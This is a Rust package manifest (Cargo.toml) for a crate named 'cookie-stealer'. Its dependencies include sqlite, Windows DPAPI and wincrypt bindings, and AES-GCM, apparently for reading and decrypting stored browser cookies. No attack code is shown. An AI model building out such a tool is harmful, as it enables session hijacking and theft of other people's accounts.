[package]
name = "cookie-stealer"
version = "0.1.0"
authors = ["winneratwin <emmetthunstad@outlook.com>"]
edition = "2018"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
sqlite = "0.25.3"
platform-dirs = "0.3.0"
serde = { version = "1", features = ["derive"] }
serde_json = "1"
base64 = "0.13.0"
winapi = { version = "0.3", features = ["dpapi","wincrypt","impl-default"] }
#windows = "0.3.1"
aes-gcm = "0.8.0"